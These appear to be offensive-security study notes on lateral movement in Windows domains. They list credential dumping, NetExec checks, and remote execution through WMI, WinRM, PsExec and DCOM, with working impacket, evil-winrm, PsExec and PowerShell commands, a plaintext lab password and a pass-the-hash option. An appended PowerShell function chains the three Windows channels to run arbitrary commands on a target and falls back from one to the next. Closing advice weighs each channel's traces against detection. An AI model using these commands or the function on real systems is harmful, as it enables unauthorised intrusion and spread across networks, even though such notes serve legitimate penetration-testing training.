Lateral movement
Techniques:
To check once on the machine (with the credentials or hashes just obtained):
- [ ] Secretsdump (dump SAM, LSA secrets and cached credentials; needs local admin on the target, or DCSync rights against a DC)
- [ ] NXC (NetExec) against SMB, RDP, MSSQL and WinRM, to see where the credentials are valid and where they give admin rights (marked "Pwn3d!")
WMI
# From Linux (impacket). WMI rides on DCOM/RPC: TCP/135 plus a dynamic high port; needs local admin on the target
wmiexec.py "$DOMAIN"/"$USER":"$PASS"@"$TARGET"
# From Windows: CIM session over DCOM, then Win32_Process.Create (ReturnValue 0 = success, 2 = access denied, 9 = path not found)
$username = 'jen';
$password = 'Nexus123!';
$secureString = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
$Options = New-CimSessionOption -Protocol DCOM
$Session = New-CimSession -ComputerName 192.168.50.73 -Credential $credential -SessionOption $Options
$command = 'calc';
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $command};
WinRM
# TCP/5985 (HTTP) or 5986 (HTTPS); the user must be in Administrators or Remote Management Users on the target
evil-winrm -i 192.168.50.73 -u jen -p 'Nexus123!'   # -H <NTLM hash> instead of -p for pass-the-hash
winrs -r:192.168.50.73 -u:jen -p:Nexus123! "cmd /c hostname & whoami"
# From PowerShell: create the session, then Enter-PSSession <Id> or Invoke-Command -Session on it
$username = 'jen';
$password = 'Nexus123!';
$secureString = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
New-PSSession -ComputerName 192.168.50.73 -Credential $credential
PsExec
# Needs local admin on the target, SMB (TCP/445) and a writable ADMIN$ share; it installs a service (PSEXESVC), so it is noisy
# On Windows with Sysinternals
./PsExec64.exe -i \\WEB04 -u corp\jen -p Nexus123! cmd
# On Linux (impacket)
psexec.py jen:'Nexus123!'@192.168.164.72
DCOM
The Component Object Model (COM) lets software components interact with each other. It was extended into the Distributed Component Object Model (DCOM) so that those components can interact across several hosts.
DCOM is reached through TCP/135 (the RPC endpoint mapper), after which the object is bound over a dynamic high port. Local administrator rights on the target are required to talk to the DCOM Service Control Manager and instantiate an object remotely.
# From Linux (impacket); -object selects the DCOM object among ShellWindows, ShellBrowserWindow and MMC20
dcomexec.py "$DOMAIN"/"$USER":"$PASS"@"$TARGET"
# From Windows: MMC20.Application runs under the current logon token (use runas /netonly to act as other credentials); "7" keeps the window minimized
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.50.73"))
$dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c calc","7")
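Added example, not part of the original notes: a single PowerShell helper that tries the three Windows-side channels above (WMI over DCOM, WinRM, and the MMC20.Application DCOM object) in order and reports which one executed the command. It adds what the bare snippets skip: checking Win32_Process.Create's ReturnValue instead of assuming success, tearing down the CIM session and releasing the COM object, and falling through to the next channel on failure. Invoke-LateralCommand is a hypothetical name; the target, credential and command line are assumptions, and the caller is assumed to already hold local admin on the target.

```powershell
# Added example (not from the original notes). Assumptions: hypothetical
# function name, target, credential and command; local admin on the target.
function Invoke-LateralCommand {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $ComputerName,
        [Parameter(Mandatory)] [pscredential] $Credential,
        [Parameter(Mandatory)] [string] $CommandLine,
        # Channels are tried in this order until one succeeds
        [ValidateSet('WMI', 'WinRM', 'DCOM')] [string[]] $Method = @('WMI', 'WinRM', 'DCOM')
    )

    foreach ($m in $Method) {
        try {
            switch ($m) {
                'WMI' {
                    # WMI over DCOM: TCP/135 plus a dynamic RPC port. Win32_Process.Create
                    # returns 0 on success, 2 access denied, 9 path not found, 21 invalid parameter.
                    $opt = New-CimSessionOption -Protocol DCOM
                    $s = New-CimSession -ComputerName $ComputerName -Credential $Credential `
                        -SessionOption $opt -ErrorAction Stop
                    try {
                        $r = Invoke-CimMethod -CimSession $s -ClassName Win32_Process -MethodName Create `
                            -Arguments @{ CommandLine = $CommandLine } -ErrorAction Stop
                        if ($r.ReturnValue -ne 0) { throw "Win32_Process.Create returned $($r.ReturnValue)" }
                        return [pscustomobject]@{ Method = 'WMI'; ProcessId = $r.ProcessId; Output = $null }
                    } finally {
                        Remove-CimSession $s
                    }
                }
                'WinRM' {
                    # WinRM: TCP/5985 (HTTP) or 5986 (HTTPS). The only channel here that returns stdout.
                    $out = Invoke-Command -ComputerName $ComputerName -Credential $Credential `
                        -ScriptBlock { param($c) cmd.exe /c $c 2>&1 } -ArgumentList $CommandLine -ErrorAction Stop
                    return [pscustomobject]@{ Method = 'WinRM'; ProcessId = $null; Output = ($out -join "`n") }
                }
                'DCOM' {
                    # MMC20.Application is instantiated under the CURRENT logon token; $Credential
                    # cannot be passed here (start this shell with runas /netonly as the target user).
                    $mmc = [System.Activator]::CreateInstance(
                        [type]::GetTypeFromProgID('MMC20.Application.1', $ComputerName))
                    try {
                        # WindowState "7" = minimized, as in the notes above
                        $mmc.Document.ActiveView.ExecuteShellCommand('cmd.exe', $null, "/c $CommandLine", '7')
                        return [pscustomobject]@{ Method = 'DCOM'; ProcessId = $null; Output = $null }
                    } finally {
                        [void][System.Runtime.InteropServices.Marshal]::ReleaseComObject($mmc)
                    }
                }
            }
        } catch {
            # Report and fall through to the next channel
            Write-Warning "$m against $ComputerName failed: $($_.Exception.Message)"
        }
    }
    throw "No lateral-movement channel succeeded against $ComputerName"
}

# Usage (hypothetical account and host, matching the notes above):
# $cred = Get-Credential corp\jen
# Invoke-LateralCommand -ComputerName 192.168.50.73 -Credential $cred -CommandLine 'hostname'
```

WMI and DCOM only tell you a process was spawned (a PID for WMI, nothing for MMC20); when you need the command's output without staging a file or a listener, put WinRM first in -Method. Each channel leaves a different trace on the target (WMI process creation under WmiPrvSE.exe, WinRM logons in the Microsoft-Windows-WinRM log, DCOM launches under mmc.exe), which is worth knowing when choosing one on an engagement where detection matters.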